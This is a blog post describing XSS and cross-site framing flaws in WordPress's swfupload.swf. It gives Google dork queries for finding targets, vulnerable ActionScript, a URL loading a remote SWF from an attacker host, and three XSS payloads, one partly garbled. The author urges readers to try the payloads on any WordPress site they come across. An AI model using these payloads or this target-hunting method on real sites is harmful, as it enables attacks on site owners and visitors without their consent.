swfupload XSF_XSS in one of the google acquitions

Hello, Fellow Readers

I was reading for some xss and XSF (cross site frame) vulnerabilities in popular wordpress swf file called swfupload.swf
, Though i heard of some google Acquitions , so started looking for domains , and i got one which is running on wordpress

As the vulnerability cannot fixed as it not a part of google now,not the recent one,
SO lets call it example.com

so used some google magic(google dork) to find swf files

#Trick to find files Is use google dorks .
#its easy to find using dorks rather than bruteforcing for hours.

site:*.site.com ext:<filetype>
     or
site:*.site.*
 or
site:site.com -subdomain

#Above are some dorks i personally use to find files and subdomains easily, (Time saver isn't it?)

Now coming back to the point..........................!

Before we began lets understand about the vulnerability and cause then we began with exploitation part.

About:~
XSF occurs when an SWF have permission/able to load another file from another directory or site.The vulnerable
swf can be exploited by just loading swf/img/any (like xss,etc)

Vulnerable code:~

ExternalInterface.addCallback("SetButtonTextStyle",this.SetButtonTextStyle);

  this.SetButtonTextStyle(String(root.loaderInfo.parameters.buttonTextStyle));
         }
         catch(ex:Object)
         {
            this.SetButtonTextStyle("");
         }
         try
         {

As you can see the .buttonTextStyle variable is not well configured ( by exactly adding the value ) and This ButtonTextStyle will accept any value
The vulneralbe SWF will load any file

http://victim.com/buttontextstyle.swf?buttonTextStyle=http://attack.com/Exploiting.swf

2.

ExternalInterface.addCallback("SetButtonText",this.SetButtonText);
SetButtonText

{
            this.SetButtonText(String(root.loaderInfo.parameters.buttonText));
         }
         catch(ex:Object)
         {
            this.SetButtonText("");
         }
         try
         {

lets come POC now ,time to exploit it
1.open http[s]://example.com/wp-includes/js/swfuploads.js
2.now try these payloads


*.payload : ?movieName="]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//

*.Payload : ?buttonImageURL=https://s3.amazonaws.com/ceblog/wp-content/uploads/2016/04/22110359/youve-been-hacked.png

*.payload :?buttonDisabled=&buttonText=%3Ca%20%20href=%22javascript:alert(document.domain)%22%3ECLICKME<br />CLICKME<br />CLICKME<br />CLICKME<br />CLICKME<br />CLICKME<br />CLICKME<br />CLICKME%3C/a%3E&buttonImageURL=/&buttonTextStyle=a{color:%23ff00ff}&buttonAction=-120&buttonCursor=-2';
setInterval(function(){document.getElementById('x').contentWindow.location=u},300)</script>


#Above are the payload i used as PoC(sorry for video)

Now you can see the above payloads are working well, you can use your creativity.

Lets take a look at the screenshot
#i have removed the link from the screenshot.
#popup contains domain name like example.com



So as usual its not a part of google so,i didn't get anything but You can trying it out , if you see any wordpress running , try it out, if there is such swf file exist.

#Tip:when u use dork try swf first, and try out the dorks above.

Thank you for reading this article,

share it.

and enjoy <3

Comments

  1. While I actually read about quite a few bing Acquisitions, hence going interested in Redirect Http to Https domain names, plus managed to get the one that is definitely going for WordPress.

    ReplyDelete

Post a Comment

Popular Posts